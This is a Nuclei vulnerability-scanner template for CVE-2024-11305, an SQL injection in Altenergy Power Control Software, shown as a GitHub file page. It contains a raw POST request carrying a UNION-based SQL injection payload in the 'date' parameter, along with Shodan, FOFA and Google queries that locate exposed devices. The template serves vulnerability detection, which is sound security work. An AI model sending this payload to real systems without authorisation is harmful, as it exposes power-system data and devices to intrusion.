forked from projectdiscovery/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCVE-2024-11305.yaml
More file actions
48 lines (44 loc) · 2.16 KB
/
CVE-2024-11305.yaml
File metadata and controls
48 lines (44 loc) · 2.16 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
id: CVE-2024-11305
info:
name: Altenergy Power Control Software - SQL Injection
author: s4e-io
severity: medium
description: |
A vulnerability classified as critical was found in Altenergy Power Control Software up to 20241108. This vulnerability affects the function get_status_zigbee of the file /index.php/display/status_zigbee. The manipulation of the argument date leads to sql injection. The attack can be initiated remotely.
impact: |
Authenticated attackers can execute SQL injection through the date parameter in the status_zigbee function to extract sensitive power system data including energy metrics and device configurations.
remediation: |
Validate and sanitize all user inputs before processing them in SQL queries. Use parameterized queries or prepared statements to prevent SQL injection attacks.
reference:
- https://blog.csdn.net/ZeroDay001/article/details/143878599
- https://cn-sec.com/archives/3447233.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-11305
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
cvss-score: 6.3
cve-id: CVE-2024-11305
cwe-id: CWE-74
epss-score: 0.36884
epss-percentile: 0.97042
metadata:
max-request: 1
vendor: apsystems
product: energy_communication_unit_firmware
shodan-query: http.title:"altenergy power control software"
fofa-query: title="altenergy power control software"
google-query: intitle:"altenergy power control software"
tags: cve,cve2024,altenergy,iot,sqli,vkev,vuln
http:
- raw:
- |
POST /index.php/display/status_zigbee HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
date=2024-11-06%' UNION ALL SELECT 11,CHAR(113)||CHAR(75,101,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,109,83,105,89,116,110,120,76,84,73,109,115,100,83,107)||CHAR(113,118,98,98,113),11-- wPIB
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Status(ZigBee)", "qKeVEsSqYdzyfSSqVTpdgEKPuXmSiYtnxLTImsdSkqvbbq")'
- 'contains(content_type, "text/html")'
- "status_code == 200"
condition: and